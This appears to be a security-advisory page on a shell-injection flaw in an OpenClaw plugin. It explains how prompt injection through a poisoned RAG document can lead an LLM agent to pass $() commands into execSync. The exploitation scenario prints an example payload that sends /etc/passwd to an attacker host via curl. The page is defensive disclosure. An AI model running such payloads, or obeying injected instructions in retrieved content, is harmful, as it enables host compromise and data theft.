CVE-2026-55249: OpenClaw RCE via shell injection

CISO Take

The @rtk-ai/rtk-rewrite plugin for OpenClaw (v1.0.0) passes attacker-controlled input directly into a Node.js execSync() template string without escaping shell metacharacters: JSON.stringify() wraps the value in double quotes but leaves $() and backtick command substitutions intact, so /bin/sh expands attacker-injected subcommands before rtk is ever invoked. The real danger here is the attack vector — any LLM agent or tool-call gateway that feeds external input (user prompts, retrieved documents, tool responses) into the exec tool creates a direct chain from prompt injection to OS-level code execution with the process's full privileges. The CVE is not in CISA KEV and no public exploit exists yet, but attack complexity is low once an adversary understands the agent's tool-invocation behavior, and the confidentiality impact is rated HIGH. Immediate action: upgrade @rtk-ai/rtk-rewrite past 1.0.0 when a patch is available; in the interim, disable the exec tool if not operationally required, enforce subprocess allowlisting, and run the OpenClaw process under a least-privilege account with OS-level sandboxing (seccomp, container isolation).

Sources: NVD GitHub Advisory ATLAS

What is the risk?

CVSS 6.3 understates practical risk in agentic AI deployments. The vulnerability class is OS command injection (CWE-78) — well-understood and trivial to exploit once the injection point is reachable. The decisive factor is the attack surface: in LLM agent pipelines, attacker-controlled content (from user prompts, RAG-retrieved documents, or upstream tool responses) routinely flows into tool parameters without sanitization. Low attack complexity and network reachability mean any internet-exposed OpenClaw deployment with this plugin is a credible target. Privilege requirements (Low) and user interaction (Required) reflect the dependency on an agent operator session, but in automated agentic workflows that 'required interaction' may be fulfilled automatically. Overall practical risk: HIGH for organizations running autonomous or semi-autonomous OpenClaw agents processing untrusted input.

How does the attack unfold?

Payload Injection

Adversary embeds $() shell metacharacters in content that will reach the exec tool's command parameter — via a crafted user prompt, a poisoned RAG document, or a malicious upstream tool-call response.

AML.T0051

Agent Tool Invocation

The LLM agent processes the attacker-influenced content and invokes the OpenClaw exec tool, passing the malicious string as the command argument to @rtk-ai/rtk-rewrite.

AML.T0053

Shell Injection Execution

execSync() interpolates the JSON.stringify()-wrapped input into a /bin/sh -c template; the shell expands the unescaped $() subcommand before rtk is invoked, executing the attacker's payload.

AML.T0050

Host Compromise

Attacker achieves arbitrary OS command execution at plugin/gateway process privilege level, enabling credential theft, data exfiltration, reverse shell establishment, or persistent backdoor installation.

AML.T0072

Payload Injection

Adversary embeds $() shell metacharacters in content that will reach the exec tool's command parameter — via a crafted user prompt, a poisoned RAG document, or a malicious upstream tool-call response.

AML.T0051

Agent Tool Invocation

The LLM agent processes the attacker-influenced content and invokes the OpenClaw exec tool, passing the malicious string as the command argument to @rtk-ai/rtk-rewrite.

AML.T0053

Shell Injection Execution

execSync() interpolates the JSON.stringify()-wrapped input into a /bin/sh -c template; the shell expands the unescaped $() subcommand before rtk is invoked, executing the attacker's payload.

AML.T0050

Host Compromise

Attacker achieves arbitrary OS command execution at plugin/gateway process privilege level, enabling credential theft, data exfiltration, reverse shell establishment, or persistent backdoor installation.

AML.T0072

What systems are affected?

Package	Ecosystem	Vulnerable Range	Patched
OpenClaw	pip	—	No patch
4 dependents 37% patched ~3d to patch Full package profile →

Do you use OpenClaw? You're affected.

How severe is it?

CVSS 3.1

6.3 / 10

EPSS

N/A

Exploitation Status

No known exploitation

Sophistication

Moderate

What is the attack surface?

AV Network

AC Low

PR Low

UI Required

S Unchanged

C High

I Low

A None

What should I do?

6 steps

PATCH

Upgrade @rtk-ai/rtk-rewrite to a version that applies shell-safe escaping (e.g., using a library like shell-quote or shlex before interpolation into execSync).
DISABLE

If the exec tool is not operationally required, disable it in OpenClaw configuration immediately.
ALLOWLIST

Restrict permissible command values to a strict allowlist; reject any input containing $(), backticks, semicolons, pipes, or redirect operators.
SANDBOX

Run the OpenClaw/rtk-rewrite process under a least-privilege OS account with seccomp filtering or inside a container that blocks unexpected subprocess spawning.
DETECT

Alert on unusual child process creation from the OpenClaw process (e.g., unexpected shells, curl/wget, base64 invocations).
AUDIT

Review all inputs flowing into the exec tool from LLM outputs or external retrieval sources for command injection payloads.

How is it classified?

Code Execution Prompt Injection Supply Chain Agent Plugin AML.T0010.005 - AI Agent Tool AML.T0049 - Exploit Public-Facing Application AML.T0050 - Command and Scripting Interpreter AML.T0051 - LLM Prompt Injection AML.T0053 - AI Agent Tool Invocation

Which compliance frameworks are affected?

This CVE is relevant to:

EU AI Act

Article 15 - Accuracy, Robustness and Cybersecurity

ISO 42001

A.8.5 - AI System Security

NIST AI RMF

MANAGE-2.2 - Mechanisms to respond to AI risks are activated for known risks

OWASP LLM Top 10

LLM05 - Improper Output Handling LLM06 - Excessive Agency

Frequently Asked Questions

What is CVE-2026-55249?

The @rtk-ai/rtk-rewrite plugin for OpenClaw (v1.0.0) passes attacker-controlled input directly into a Node.js execSync() template string without escaping shell metacharacters: JSON.stringify() wraps the value in double quotes but leaves $() and backtick command substitutions intact, so /bin/sh expands attacker-injected subcommands before rtk is ever invoked. The real danger here is the attack vector — any LLM agent or tool-call gateway that feeds external input (user prompts, retrieved documents, tool responses) into the exec tool creates a direct chain from prompt injection to OS-level code execution with the process's full privileges. The CVE is not in CISA KEV and no public exploit exists yet, but attack complexity is low once an adversary understands the agent's tool-invocation behavior, and the confidentiality impact is rated HIGH. Immediate action: upgrade @rtk-ai/rtk-rewrite past 1.0.0 when a patch is available; in the interim, disable the exec tool if not operationally required, enforce subprocess allowlisting, and run the OpenClaw process under a least-privilege account with OS-level sandboxing (seccomp, container isolation).

Is CVE-2026-55249 actively exploited?

No confirmed active exploitation of CVE-2026-55249 has been reported, but organizations should still patch proactively.

How to fix CVE-2026-55249?

1. PATCH: Upgrade @rtk-ai/rtk-rewrite to a version that applies shell-safe escaping (e.g., using a library like shell-quote or shlex before interpolation into execSync). 2. DISABLE: If the exec tool is not operationally required, disable it in OpenClaw configuration immediately. 3. ALLOWLIST: Restrict permissible command values to a strict allowlist; reject any input containing $(), backticks, semicolons, pipes, or redirect operators. 4. SANDBOX: Run the OpenClaw/rtk-rewrite process under a least-privilege OS account with seccomp filtering or inside a container that blocks unexpected subprocess spawning. 5. DETECT: Alert on unusual child process creation from the OpenClaw process (e.g., unexpected shells, curl/wget, base64 invocations). 6. AUDIT: Review all inputs flowing into the exec tool from LLM outputs or external retrieval sources for command injection payloads.

What systems are affected by CVE-2026-55249?

This vulnerability affects the following AI/ML architecture patterns: LLM agent frameworks, AI agent tool integrations, LLM gateway deployments, RAG-augmented agent pipelines, Multi-agent orchestration systems.

What is the CVSS score for CVE-2026-55249?

CVE-2026-55249 has a CVSS v3.1 base score of 6.3 (MEDIUM).

What is the AI security impact?

Affected AI Architectures

LLM agent frameworksAI agent tool integrationsLLM gateway deploymentsRAG-augmented agent pipelinesMulti-agent orchestration systems

MITRE ATLAS Techniques

AML.T0010.005 AI Agent Tool

AML.T0049 Exploit Public-Facing Application

AML.T0050 Command and Scripting Interpreter

AML.T0051 LLM Prompt Injection

AML.T0053 AI Agent Tool Invocation

Compliance Controls Affected

EU AI Act: Article 15

ISO 42001: A.8.5

NIST AI RMF: MANAGE-2.2

OWASP LLM Top 10: LLM05, LLM06

What are the technical details?

Original Advisory

@rtk-ai/rtk-rewrite transparently rewrites shell commands executed via OpenClaw's exec tool to their RTK equivalents. In 1.0.0, the @rtk-ai/rtk-rewrite OpenClaw plugin passes attacker-controlled input directly into a shell-backed execSync() template string without shell-safe escaping. JSON.stringify() wraps the value in double quotes and escapes inner double-quotes and backslashes, but leaves $() and backtick shell metacharacters untouched. Because execSync delegates execution to /bin/sh -c, the shell expands $(...) substitutions even inside double-quoted strings, causing the injected subcommand to execute before rtk is invoked. An attacker who can influence the exec tool's command parameter (e.g., via an LLM agent prompt or gateway/tool-call input) achieves arbitrary OS command execution with the privileges of the plugin/gateway process.

Exploitation Scenario

An adversary targeting an organization running an OpenClaw-based AI assistant embeds a payload such as $(curl attacker.com/exfil?data=$(cat /etc/passwd | base64)) inside a document that will be retrieved by the agent's RAG pipeline. When a user queries the agent, the LLM processes the retrieved content and — following its instructions or the injected payload's social-engineering framing — invokes the exec tool with the malicious string as the command parameter. The @rtk-ai/rtk-rewrite plugin wraps the value in double quotes via JSON.stringify() and interpolates it into the execSync() call; /bin/sh expands the $() substitution before rtk runs, causing the data exfiltration command to execute silently under the gateway process account. The agent returns a normal-looking response while the attacker receives the exfiltrated credential data out-of-band.

Weaknesses (CWE)

CWE-78 Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')

CWE-78 — Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection'): The product constructs all or part of an OS command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended OS command when it is sent to a downstream component.

[Architecture and Design] If at all possible, use library calls rather than external processes to recreate the desired functionality.
[Architecture and Design, Operation] Run the code in a "jail" or similar sandbox environment that enforces strict boundaries between the process and the operating system. This may effectively restrict which files can be accessed in a particular directory or which commands can be executed by the software. OS-level examples include the Unix chroot jail, AppArmor, and SELinux. In general, managed code may provide some protection. For example, java.io.FilePermission in the Java SecurityManager allows the software to specify restrictions on file operations. This may not be a feasible solution, and it only limits the impact to the operating system; the rest of the application may still be subject to compromise. Be careful to avoid CWE-243 and other weaknesses related to jails.

Source: MITRE CWE corpus.